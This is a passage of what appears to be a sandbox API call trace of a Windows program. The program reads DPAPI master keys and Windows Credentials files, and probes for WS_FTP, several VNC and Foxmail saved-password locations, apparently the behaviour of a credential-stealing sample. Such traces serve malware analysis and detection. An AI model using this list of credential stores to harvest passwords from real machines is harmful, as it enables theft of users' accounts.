dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x580d80 [0182.727] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.727] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf68faea, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x258, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0182.727] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8060823c, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x8060823c, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0182.728] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf753085, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0182.728] FindNextFileW (in: hFindFile=0x580d80, lpFindFileData=0x19ed8c | out: lpFindFileData=0x19ed8c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf753085, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0182.728] FindClose (in: hFindFile=0x580d80 | out: hFindFile=0x580d80) returned 1 [0182.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f014) returned 1 [0182.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f020) returned 1 [0182.735] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15", nBufferLength=0x105, lpBuffer=0x19eb3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15", lpFilePart=0x0) returned 0x8b [0182.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efe4) returned 1 [0182.735] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15"), fInfoLevelId=0x0, lpFileInformation=0x19f060 | out: lpFileInformation=0x19f060*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8060823c, ftCreationTime.dwHighDateTime=0x1d8a649, ftLastAccessTime.dwLowDateTime=0x8060823c, ftLastAccessTime.dwHighDateTime=0x1d8a649, ftLastWriteTime.dwLowDateTime=0x80627df0, ftLastWriteTime.dwHighDateTime=0x1d8a649, nFileSizeHigh=0x0, nFileSizeLow=0x1d4)) returned 1 [0182.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efe0) returned 1 [0182.735] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15", nBufferLength=0x105, lpBuffer=0x19eb4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15", lpFilePart=0x0) returned 0x8b [0182.735] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000", nBufferLength=0x105, lpBuffer=0x19eb28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000", lpFilePart=0x0) returned 0x66 [0182.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15", nBufferLength=0x105, lpBuffer=0x19ea38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15", lpFilePart=0x0) returned 0x8b [0182.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef70) returned 1 [0182.839] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1560258661-3990802383-1811730007-1000\\1c1d304f-aa8f-4534-b2cb-33b61c83ed15"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4dc [0182.839] GetFileType (hFile=0x4dc) returned 0x1 [0182.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef6c) returned 1 [0182.839] GetFileType (hFile=0x4dc) returned 0x1 [0182.839] GetFileSize (in: hFile=0x4dc, lpFileSizeHigh=0x19f06c | out: lpFileSizeHigh=0x19f06c*=0x0) returned 0x1d4 [0182.840] ReadFile (in: hFile=0x4dc, lpBuffer=0x23581bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f018, lpOverlapped=0x0 | out: lpBuffer=0x23581bc*, lpNumberOfBytesRead=0x19f018*=0x1d4, lpOverlapped=0x0) returned 1 [0182.840] CloseHandle (hObject=0x4dc) returned 1 [0183.858] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", nBufferLength=0x105, lpBuffer=0x19ea38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpFilePart=0x0) returned 0x5a [0183.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef70) returned 1 [0183.858] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e8 [0183.858] GetFileType (hFile=0x4e8) returned 0x1 [0183.858] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef6c) returned 1 [0183.858] GetFileType (hFile=0x4e8) returned 0x1 [0183.859] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x19f06c | out: lpFileSizeHigh=0x19f06c*=0x0) returned 0x2ac0 [0183.859] ReadFile (in: hFile=0x4e8, lpBuffer=0x22f84d4, nNumberOfBytesToRead=0x2ac0, lpNumberOfBytesRead=0x19f018, lpOverlapped=0x0 | out: lpBuffer=0x22f84d4*, lpNumberOfBytesRead=0x19f018*=0x2ac0, lpOverlapped=0x0) returned 1 [0183.859] CloseHandle (hObject=0x4e8) returned 1 [0183.953] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0183.953] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x25 [0183.953] CoTaskMemFree (pv=0x5b20c8) [0183.954] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini", nBufferLength=0x105, lpBuffer=0x19eb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini", lpFilePart=0x0) returned 0x46 [0183.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efb0) returned 1 [0183.954] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ipswitch\\ws_ftp\\sites\\ws_ftp.ini"), fInfoLevelId=0x0, lpFileInformation=0x19f02c | out: lpFileInformation=0x19f02c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0183.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efac) returned 1 [0183.995] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Wow6432Node\\RealVNC\\WinVNC4", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.996] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Wow6432Node\\RealVNC\\WinVNC4", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\RealVNC\\vncserver", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\RealVNC\\vncserver", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\RealVNC\\WinVNC4", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.998] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\RealVNC\\WinVNC4", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\ORL\\WinVNC3", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.998] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\ORL\\WinVNC3", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\TightVNC\\Server", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.998] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\TightVNC\\Server", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\TightVNC\\Server", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.998] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\TightVNC\\Server", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\TightVNC\\Server", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.999] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\TightVNC\\Server", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\TigerVNC\\Server", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.999] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\TigerVNC\\Server", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ef7c | out: phkResult=0x19ef7c*=0x0) returned 0x2 [0183.999] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.000] GetEnvironmentVariableW (in: lpName="ProgramFiles(x86)", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x16 [0184.000] CoTaskMemFree (pv=0x5b20c8) [0184.001] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.001] GetEnvironmentVariableW (in: lpName="ProgramFiles(x86)", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x16 [0184.001] CoTaskMemFree (pv=0x5b20c8) [0184.002] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.002] GetEnvironmentVariableW (in: lpName="ProgramFiles", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x16 [0184.002] CoTaskMemFree (pv=0x5b20c8) [0184.002] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.002] GetEnvironmentVariableW (in: lpName="ProgramFiles", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x16 [0184.002] CoTaskMemFree (pv=0x5b20c8) [0184.002] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.002] GetEnvironmentVariableW (in: lpName="ProgramFiles", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x16 [0184.002] CoTaskMemFree (pv=0x5b20c8) [0184.003] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.003] GetEnvironmentVariableW (in: lpName="ProgramFiles", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x16 [0184.003] CoTaskMemFree (pv=0x5b20c8) [0184.003] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.003] GetEnvironmentVariableW (in: lpName="ProgramFiles(x86)", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x16 [0184.003] CoTaskMemFree (pv=0x5b20c8) [0184.003] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.003] GetEnvironmentVariableW (in: lpName="ProgramFiles(x86)", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x16 [0184.003] CoTaskMemFree (pv=0x5b20c8) [0184.003] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini", nBufferLength=0x105, lpBuffer=0x19ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini", lpFilePart=0x0) returned 0x36 [0184.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef10) returned 1 [0184.003] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini" (normalized: "c:\\program files (x86)\\uvnc bvba\\ultravnc\\ultravnc.ini"), fInfoLevelId=0x0, lpFileInformation=0x19ef8c | out: lpFileInformation=0x19ef8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef0c) returned 1 [0184.004] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini", nBufferLength=0x105, lpBuffer=0x19ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini", lpFilePart=0x0) returned 0x36 [0184.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef10) returned 1 [0184.004] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini" (normalized: "c:\\program files (x86)\\uvnc bvba\\ultravnc\\ultravnc.ini"), fInfoLevelId=0x0, lpFileInformation=0x19ef8c | out: lpFileInformation=0x19ef8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef0c) returned 1 [0184.004] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini", nBufferLength=0x105, lpBuffer=0x19ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini", lpFilePart=0x0) returned 0x36 [0184.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef10) returned 1 [0184.004] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini" (normalized: "c:\\program files (x86)\\uvnc bvba\\ultravnc\\ultravnc.ini"), fInfoLevelId=0x0, lpFileInformation=0x19ef8c | out: lpFileInformation=0x19ef8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef0c) returned 1 [0184.004] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini", nBufferLength=0x105, lpBuffer=0x19ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini", lpFilePart=0x0) returned 0x36 [0184.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef10) returned 1 [0184.004] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\uvnc bvba\\UltraVNC\\ultravnc.ini" (normalized: "c:\\program files (x86)\\uvnc bvba\\ultravnc\\ultravnc.ini"), fInfoLevelId=0x0, lpFileInformation=0x19ef8c | out: lpFileInformation=0x19ef8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef0c) returned 1 [0184.005] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini", nBufferLength=0x105, lpBuffer=0x19ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini", lpFilePart=0x0) returned 0x2c [0184.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef10) returned 1 [0184.005] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini" (normalized: "c:\\program files (x86)\\ultravnc\\ultravnc.ini"), fInfoLevelId=0x0, lpFileInformation=0x19ef8c | out: lpFileInformation=0x19ef8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef0c) returned 1 [0184.005] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini", nBufferLength=0x105, lpBuffer=0x19ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini", lpFilePart=0x0) returned 0x2c [0184.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef10) returned 1 [0184.005] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini" (normalized: "c:\\program files (x86)\\ultravnc\\ultravnc.ini"), fInfoLevelId=0x0, lpFileInformation=0x19ef8c | out: lpFileInformation=0x19ef8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef0c) returned 1 [0184.005] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini", nBufferLength=0x105, lpBuffer=0x19ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini", lpFilePart=0x0) returned 0x2c [0184.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef10) returned 1 [0184.005] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini" (normalized: "c:\\program files (x86)\\ultravnc\\ultravnc.ini"), fInfoLevelId=0x0, lpFileInformation=0x19ef8c | out: lpFileInformation=0x19ef8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef0c) returned 1 [0184.005] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini", nBufferLength=0x105, lpBuffer=0x19ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini", lpFilePart=0x0) returned 0x2c [0184.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef10) returned 1 [0184.005] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\UltraVNC\\ultravnc.ini" (normalized: "c:\\program files (x86)\\ultravnc\\ultravnc.ini"), fInfoLevelId=0x0, lpFileInformation=0x19ef8c | out: lpFileInformation=0x19ef8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef0c) returned 1 [0184.036] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Aerofox\\FoxmailPreview", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eeec | out: phkResult=0x19eeec*=0x0) returned 0x2 [0184.038] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Aerofox\\Foxmail\\V3.1", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eeec | out: phkResult=0x19eeec*=0x0) returned 0x2 [0184.039] GetFullPathNameW (in: lpFileName="\\Storage\\", nBufferLength=0x105, lpBuffer=0x19ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Storage\\", lpFilePart=0x0) returned 0xb [0184.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eeb4) returned 1 [0184.039] GetFileAttributesExW (in: lpFileName="C:\\Storage\\" (normalized: "c:\\storage"), fInfoLevelId=0x0, lpFileInformation=0x19ef30 | out: lpFileInformation=0x19ef30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eeb0) returned 1 [0184.040] GetFullPathNameW (in: lpFileName="\\mail\\", nBufferLength=0x105, lpBuffer=0x19ea10, lpFilePart=0x0 | out: lpBuffer="C:\\mail\\", lpFilePart=0x0) returned 0x8 [0184.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eeb4) returned 1 [0184.040] GetFileAttributesExW (in: lpFileName="C:\\mail\\" (normalized: "c:\\mail"), fInfoLevelId=0x0, lpFileInformation=0x19ef30 | out: lpFileInformation=0x19ef30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eeb0) returned 1 [0184.040] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.040] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.041] CoTaskMemFree (pv=0x5b20c8) [0184.041] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0184.041] GetFullPathNameW (in: 